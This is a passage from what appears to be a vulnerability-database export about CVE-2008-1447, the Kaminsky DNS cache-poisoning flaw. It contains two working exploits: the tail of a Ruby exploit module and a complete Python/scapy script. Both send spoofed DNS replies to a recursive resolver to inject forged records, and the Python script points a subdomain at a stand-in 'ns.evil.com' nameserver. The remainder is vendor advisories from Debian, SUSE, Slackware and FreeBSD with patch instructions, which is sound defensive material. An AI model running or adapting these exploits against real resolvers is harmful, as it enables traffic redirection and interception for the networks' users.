Resolv::DNS::Resource::IN::A&#41;\r\n query.rd = 0\r\n\r\n begin\r\n cached = false\r\n srv_sock.put&#40;query.encode&#41;\r\n answer, addr = srv_sock.recvfrom&#40;&#41;\r\n\r\n if answer and answer.length &gt; 0\r\n answer = Resolv::DNS::Message.decode&#40;answer&#41;\r\n answer.each_answer do |name, ttl, data|\r\n if&#40;&#40;name.to_s + &quot;.&quot;&#41; == hostname and\r\ndata.address.to_s == address&#41;\r\n t = Time.now + ttl\r\n print_status&#40;&quot;Failure: This hostname is\r\nalready in the target cache: #{name} == #{address}&quot;&#41;\r\n print_status&#40;&quot; Cache entry expires on\r\n#{t.to_s}... sleeping.&quot;&#41;\r\n cached = true\r\n sleep ttl\r\n end\r\n end\r\n end\r\n end until not cached\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception =&gt; e\r\n print_status&#40;&quot;Error checking the DNS name: #{e.class} #{e} #{e.backtrace}&quot;&#41;\r\n end\r\n\r\n res0 = Net::DNS::Resolver.new&#40;:nameservers =&gt; [recons], :dns_search =&gt; false,\r\n:recursive =&gt; true&#41; # reconnaissance resolver\r\n\r\n print_status &quot;Targeting nameserver #{target} for injection of #{hostname} as\r\n#{address}&quot;\r\n\r\n # Look up the nameservers for the domain\r\n print_status &quot;Querying recon nameserver for #{domain}&#39;s nameservers...&quot;\r\n answer0 = res0.send&#40;domain, Net::DNS::NS&#41;\r\n #print_status &quot; Got answer with #{answer0.header.anCount} answers,\r\n#{answer0.header.nsCount} authorities&quot;\r\n\r\n barbs = [] # storage for nameservers\r\n answer0.answer.each do |rr0|\r\n print_status &quot; Got an #{rr0.type} record: #{rr0.inspect}&quot;\r\n if rr0.type == &#39;NS&#39;\r\n print_status &quot; Querying recon nameserver for address of\r\n#{rr0.nsdname}...&quot;\r\n answer1 = res0.send&#40;rr0.nsdname&#41; # get the ns&#39;s answer for the\r\nhostname\r\n #print_status &quot; Got answer with #{answer1.header.anCount} answers,\r\n#{answer1.header.nsCount} authorities&quot;\r\n answer1.answer.each do |rr1|\r\n print_status &quot; Got an #{rr1.type} record: #{rr1.inspect}&quot;\r\n res2 = Net::DNS::Resolver.new&#40;:nameservers =&gt; rr1.address,\r\n:dns_search =&gt; false, :recursive =&gt; false, :retry =&gt; 1&#41; \r\n print_status &quot; Checking Authoritativeness: Querying\r\n#{rr1.address} for #{domain}...&quot;\r\n answer2 = res2.send&#40;domain&#41;\r\n if answer2 and answer2.header.auth? and\r\nanswer2.header.anCount &gt;= 1\r\n nsrec = {:name =&gt; rr0.nsdname, :addr =&gt; rr1.address}\r\n barbs &lt;&lt; nsrec\r\n print_status &quot; #{rr0.nsdname} is authoritative for\r\n#{domain}, adding to list of nameservers to spoof as&quot;\r\n end\r\n end\r\n end \r\n end\r\n\r\n if barbs.length == 0\r\n print_status&#40; &quot;No DNS servers found.&quot;&#41;\r\n srv_sock.close\r\n disconnect_ip\r\n return\r\n end\r\n\r\n # Flood the target with queries and spoofed responses, one will eventually hit\r\n queries = 0\r\n responses = 0\r\n\r\n connect_ip if not ip_sock\r\n\r\n print_status&#40; &quot;Attempting to inject a poison record for #{hostname} into\r\n#{target}:#{sport}...&quot;&#41;\r\n\r\n while true\r\n randhost = Rex::Text.rand_text_alphanumeric&#40;12&#41; + &#39;.&#39; + domain # randomize\r\nthe hostname\r\n\r\n # Send spoofed query\r\n req = Resolv::DNS::Message.new\r\n req.id = rand&#40;2**16&#41;\r\n req.add_question&#40;randhost, Resolv::DNS::Resource::IN::A&#41;\r\n\r\n req.rd = 1\r\n\r\n buff = &#40;\r\n Scruby::IP.new&#40;\r\n #:src =&gt; barbs[0][:addr].to_s,\r\n :src =&gt; source,\r\n :dst =&gt; target,\r\n :proto =&gt; 17\r\n &#41;/Scruby::UDP.new&#40;\r\n :sport =&gt; &#40;rand&#40;&#40;2**16&#41;-1024&#41;+1024&#41;.to_i,\r\n :dport =&gt; 53\r\n &#41;/req.encode\r\n &#41;.to_net\r\n ip_sock.sendto&#40;buff, target&#41;\r\n queries += 1\r\n \r\n # Send evil spoofed answer from ALL nameservers &#40;barbs[*][:addr]&#41;\r\n req.add_answer&#40;randhost, ttl, Resolv::DNS::Resource::IN::A.new&#40;address&#41;&#41;\r\n req.add_authority&#40;domain, ttl,\r\nResolv::DNS::Resource::IN::NS.new&#40;Resolv::DNS::Name.create&#40;hostname&#41;&#41;&#41;\r\n req.add_additional&#40;hostname, ttl, Resolv::DNS::Resource::IN::A.new&#40;address&#41;&#41;\r\n req.qr = 1\r\n req.ra = 1\r\n\r\n xidbase.upto&#40;xidbase+xids-1&#41; do |id|\r\n req.id = id\r\n barbs.each do |barb|\r\n buff = &#40;\r\n Scruby::IP.new&#40;\r\n #:src =&gt; barbs[i][:addr].to_s,\r\n :src =&gt; barb[:addr].to_s,\r\n :dst =&gt; target,\r\n :proto =&gt; 17\r\n &#41;/Scruby::UDP.new&#40;\r\n :sport =&gt; 53,\r\n :dport =&gt; sport.to_i\r\n &#41;/req.encode\r\n &#41;.to_net\r\n ip_sock.sendto&#40;buff, target&#41;\r\n responses += 1\r\n end\r\n end\r\n\r\n # status update\r\n if queries &#37; 1000 == 0\r\n print_status&#40;&quot;Sent #{queries} queries and #{responses} spoofed\r\nresponses...&quot;&#41;\r\n end\r\n\r\n # every so often, check and see if the target is poisoned...\r\n if queries &#37; 250 == 0 \r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question&#40;hostname, Resolv::DNS::Resource::IN::A&#41;\r\n query.rd = 0\r\n \r\n srv_sock.put&#40;query.encode&#41;\r\n answer, addr = srv_sock.recvfrom&#40;&#41;\r\n\r\n if answer and answer.length &gt; 0\r\n answer = Resolv::DNS::Message.decode&#40;answer&#41;\r\n answer.each_answer do |name, ttl, data|\r\n if&#40;&#40;name.to_s + &quot;.&quot;&#41; == hostname and\r\ndata.address.to_s == address&#41;\r\n print_status&#40;&quot;Poisoning successful\r\nafter #{queries} attempts: #{name} == #{address}&quot;&#41;\r\n disconnect_ip\r\n return\r\n end\r\n end\r\n end\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception =&gt; e\r\n print_status&#40;&quot;Error querying the DNS name: #{e.class} #{e}\r\n#{e.backtrace}&quot;&#41;\r\n end\r\n end\r\n\r\n end\r\n\r\n end\r\n\r\nend\r\nend\r\n\r\n\r\n-- \r\nI&#41;ruid, C&#178;ISSP\r\ndruid@caughq.org\r\nhttp://druid.caughq.org", "edition": 1, "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SECURITYVULNS:DOC:20222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20222", "title": "CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1605-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 08, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc\r\nVulnerability : DNS cache poisoning\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id&#40;s&#41; : CVE-2008-1447\r\nCERT advisory : VU#800113\r\n\r\n\r\nDan Kaminsky discovered that properties inherent to the DNS protocol\r\nlead to practical DNS spoofing and cache poisoning attacks. Among\r\nother things, successful attacks can lead to misdirected web traffic\r\nand email rerouting.\r\n\r\nAt this time, it is not possible to implement the recommended\r\ncountermeasures in the GNU libc stub resolver. The following\r\nworkarounds are available:\r\n\r\n1. Install a local BIND 9 resoler on the host, possibly in\r\nforward-only mode. BIND 9 will then use source port randomization\r\nwhen sending queries over the network. &#40;Other caching resolvers can\r\nbe used instead.&#41;\r\n\r\n2. Rely on IP address spoofing protection if available. Successful\r\nattacks must spoof the address of one of the resolvers, which may not\r\nbe possible if the network is guarded properly against IP spoofing\r\nattacks &#40;both from internal and external sources&#41;.\r\n\r\nThis DSA will be updated when patches for hardening the stub resolver\r\nare available.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: &#96;apt-cache show &lt;pkg&gt;&#39; and http://packages.debian.org/&lt;pkg&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 &#40;GNU/Linux&#41;\r\n\r\niQEVAwUBSHOIFr97/wQC1SS+AQIscwf+KBKMT4hcpB5TCNE+0v1DNBHiQ4rh7ktz\r\nKiOyLWEJOaxOrpsR8siA6B6newiLe5KfwojDikqSCXbubTCeicj79HTCx5DzzhTm\r\naa3HePARxmtN1AuyFCebOfklibTtyY/gpwydCdAVBiV0+LmD+jXy9Jx4AfyuibXZ\r\nVaqkUTj5sUUQn5CacdI1zc1Ky1rzbzRBBoNJ1D1rRBU1wjoGsvVjBV9p24j/1E2c\r\nmYtbY3g1FKmhnOTLBac/AAW62ZQ44yf4QcGgwV8CULfi5c2QmGiRYZioWDVd0pfZ\r\nhr2h/Vmjs2qgf8B9FmYet0hEGm6SrEryT2ievlqXkpul0MYtHjJ5iw==\r\n=CMHb\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20145", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T21:49:45", "description": "BUGTRAQ ID: 27283\r\nCVE(CAN) ID: CVE-2008-0122\r\n\r\nFreeBSD\u5c31\u662f\u4e00\u79cd\u8fd0\u884c\u5728Intel\u5e73\u53f0\u4e0a\u3001\u53ef\u4ee5\u81ea\u7531\u4f7f\u7528\u7684\u5f00\u653e\u6e90\u7801Unix\u7c7b\u7cfb\u7edf\u3002\r\n\r\nFreeBSD\u7684inet_network()\u51fd\u6570\u4e2d\u7684\u5355\u5b57\u8282\u6ea2\u51fa\u53ef\u80fd\u7531\u67d0\u4e9b\u8f93\u5165\u5bfc\u81f4\u5185\u5b58\u7834\u574f\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u63d0\u5347\u6743\u9650\u6216\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\n\u5982\u679c\u7a0b\u5e8f\u5411inet_network()\u4f20\u9001\u4e0d\u53ef\u4fe1\u4efb\u6570\u636e\u7684\u8bdd\uff0c\u653b\u51fb\u8005\u5c31\u53ef\u4ee5\u901a\u8fc7\u5411inet_network()\u4f20\u9001\u7279\u5236\u8f93\u5165\u5bfc\u81f4\u7528\u7528\u6237\u5b9a\u4e49\u7684\u6570\u636e\u8986\u76d6\u5185\u5b58\u533a\u57df\u3002\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u4f7f\u7528inet_network()\u7684\u7a0b\u5e8f\u4e2d\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u6267\u884c\u4ee3\u7801\uff0c\u5177\u4f53\u53d6\u51b3\u4e8e\u6240\u8986\u76d6\u7684\u5185\u5b58\u533a\u57df\u3002\r\n\n\nFreeBSD FreeBSD 7.0\r\nFreeBSD FreeBSD 6.3\r\nFreeBSD FreeBSD 6.2\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nFreeBSD\r\n-------\r\nFreeBSD\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08FreeBSD-SA-08:02\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nFreeBSD-SA-08:02\uff1ainet_network() buffer overflow\r\n\u94fe\u63a5\uff1a<a href=ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-08:02.libc.asc target=_blank>ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-08:02.libc.asc</a>\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1a\r\n\r\n\u6267\u884c\u4ee5\u4e0b\u6b65\u9aa4\u4e4b\u4e00\uff1a\r\n\r\n1) \u5c06\u6709\u6f0f\u6d1e\u7684\u7cfb\u7edf\u5347\u7ea7\u52307.0-PRERELEASE\u62166-STABLE\uff0c\u6216\u4fee\u6539\u65e5\u671f\u4e4b\u540e\u7684RELENG_7_0\u3001\r\nRELENG_6_3\u6216RELENG_6_2\u5b89\u5168\u7248\u672c\u3002\r\n\r\n2) \u4e3a\u5f53\u524d\u7cfb\u7edf\u6253\u8865\u4e01\uff1a\r\n\r\n\u4ee5\u4e0b\u8865\u4e01\u786e\u8ba4\u53ef\u5e94\u7528\u4e8eFreeBSD 7.0\u30016.3\u62166.2\u7cfb\u7edf\u3002\r\n\r\na) \u4ece\u4ee5\u4e0b\u4f4d\u7f6e\u4e0b\u8f7d\u76f8\u5173\u8865\u4e01\uff0c\u5e76\u4f7f\u7528PGP\u5de5\u5177\u9a8c\u8bc1\u9644\u5e26\u7684PGP\u7b7e\u540d\u3002\r\n\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:02/libc.patch target=_blank>http://security.FreeBSD.org/patches/SA-08:02/libc.patch</a>\r\n# fetch <a href=http://security.FreeBSD.org/patches/SA-08:02/libc.patch.asc target=_blank>http://security.FreeBSD.org/patches/SA-08:02/libc.patch.asc</a>\r\n\r\nb) \u4ee5root\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1a\r\n\r\n# cd /usr/src\r\n# patch &lt; /path/to/patch", "published": "2008-01-23T00:00:00", "title": "FreeBSD inet_network()\u51fd\u6570\u5355\u5b57\u8282\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0122"], "modified": "2008-01-23T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2853", "id": "SSV:2853", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T21:33:51", "description": "No description provided by source.", "published": "2008-07-24T00:00:00", "title": "BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17308", "id": "SSV:17308", "sourceData": "\n from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez &lt;ju@klipix.org&gt;\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = &quot;X.X.X.X&quot;\n# Vulnerable recursive DNS server\ntargetdns = &quot;X.X.X.X&quot;\n# Authoritative NS for the target domain\nsrcdns = [&quot;X.X.X.X&quot;]\n\n# Domain to play with\ndummydomain = &quot;&quot;\nbasedomain = &quot;.example.com.&quot;\n# sub-domain to claim authority on\ndomain = &quot;sub.example.com.&quot;\n# Spoofed authoritative DNS for the sub-domain\nspoof=&quot;ns.evil.com.&quot;\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = &quot;a&quot; + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint &quot;Sending our reply from %s with TXID = %s for %s&quot; % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint &quot;Successfully poisonned our target with a dummy record !!&quot;\n\t\t\tbreak\n\texcept:\n\t\tprint &quot;Poisonning failed&quot;\n\n# milw0rm.com [2008-07-24]\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-17308"}], "suse": [{"lastseen": "2016-09-04T11:48:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "The bind daemon is responsible for resolving hostnames in IP addresses and vice versa. The new version of bind uses a random transaction-ID (TRXID) and a random UDP source-port for DNS queries to address DNS cache poisoning attacks possible because of the \"birthday paradox\" and an attack discovered by Dan Kaminsky. Unfortunately we do not have details about Kaminsky's attack and have to trust the statement that a random UDP source-port is sufficient to stop it. DNS servers that do not support recursive queries or do not use a cache (authoritative only servers) are not vulnerable too. Update packages of bind9 for SLES8 will be available soon. The glibc stub resolver is known to be vulnerable too and we will publish updates as soon as possible. Note, a local attacker can always sniff DNS queries and generate spoofed responses easily. If you use the UDP source-port number of the DNS server in your firewall configuration, for example to let DNS queries through your packetfilter, then you have to take steps to adapt your filter rules to the new behavior of the DNS server.\n#### Solution\nTo protect your infrastructure from cache poisoning attacks you should provide two DNS servers. One that is authoritative only and accessible from the Internet to resolve queries for your local systems that are available over the Internet. The other system (caching) is not accessible over the Internet and can be used by internal clients to recursively lookup names and addresses. But we encourage you to install the bind update as soon as possible too. If you use the latest update of pdns-recursor you are not vulnerable to this attack. For the glibc stub resolver bug you can install a local secure DNS for- warder on your machine or make a DNS forwarder available for a protected network.", "edition": 1, "modified": "2008-07-11T09:57:52", "published": "2008-07-11T09:57:52", "id": "SUSE-SA:2008:033", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00003.html", "title": "DNS cache poisoning in bind", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "slackware": [{"lastseen": "2020-10-25T16:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz:\n Upgraded to bind-9.4.2-P1.\n This upgrade addresses a security flaw known as the CERT VU#800113 DNS Cache\n Poisoning Issue. This is the summary of the problem from the BIND site:\n \"A weakness in the DNS protocol may enable the poisoning of caching\n recurive resolvers with spoofed data. DNSSEC is the only full solution.\n New versions of BIND provide increased resilience to the attack.\"\n It is suggested that sites that run BIND upgrade to one of the new packages\n in order to reduce their exposure to DNS cache poisoning attacks.\n For more information, see:\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.4.2_P1-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc693e1ae4997c7cc23c0051ec1c90796 bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n24326f563c6588a0541f3409bc7298cd bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n67178dd97006cf4cf3543704c82741b8 bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\na12c9e8304c5a7e285fa4df7d4b9756b bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n6209e4a5f9693451279b0d02795b9bd8 bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\ne1c6d74c787fa3b7f3a5905fef206206 bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nd354a0118388bb0f3fd32fa79166746a bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n5b1087e6a0dc79ebf06144f44d5bb52f bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nda76550505d62f0d902b710a078d1020 bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nSlackware -current package:\nc255530e46f4cff8080a20b6c8d12443 bind-9.4.2_P1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nThen, restart the nameserver:\n > /etc/rc.d/rc.bind restart", "modified": "2008-07-10T04:29:01", "published": "2008-07-10T04:29:01", "id": "SSA-2008-191-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\n\nMore details about the issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz:\n Upgraded to ruby-1.8.6-p287.\n This fixes several bugs in the previous Ruby update, including a security\n issue where the DNS resolver did not randomize the source port and\n transaction id sufficiently.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n68f319999719565f3f05acf61e791f92 ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n967059ae6d9a3a3ea609472e4f3c3903 ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbc821c4e4eee3608e1c5e2e30238b450 ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.8.6_p287-i486-1_slack12.1.tgz", "modified": "2008-11-29T21:37:03", "published": "2008-11-29T21:37:03", "id": "SSA-2008-334-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.371754", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2020-11-11T13:28:32", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1617-1 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nJuly 25, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : refpolicy\nVulnerability : incompatible policy\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nDebian Bug : 490271\n\nIn DSA-1603-1, Debian released an update to the BIND 9 domain name\nserver, which introduced UDP source port randomization to mitigate\nthe threat of DNS cache poisoning attacks (identified by the Common\nVulnerabilities and Exposures project as CVE-2008-1447). The fix,\nwhile correct, was incompatible with the version of SELinux Reference\nPolicy shipped with Debian Etch, which did not permit a process\nrunning in the named_t domain to bind sockets to UDP ports other than\nthe standard &#x27;domain&#x27; port (53). The incompatibility affects both\nthe &#x27;targeted&#x27; and &#x27;strict&#x27; policy packages supplied by this version\nof refpolicy.\n\nThis update to the refpolicy packages grants the ability to bind to\narbitrary UDP ports to named_t processes. When installed, the\nupdated packages will attempt to update the bind policy module on\nsystems where it had been previously loaded and 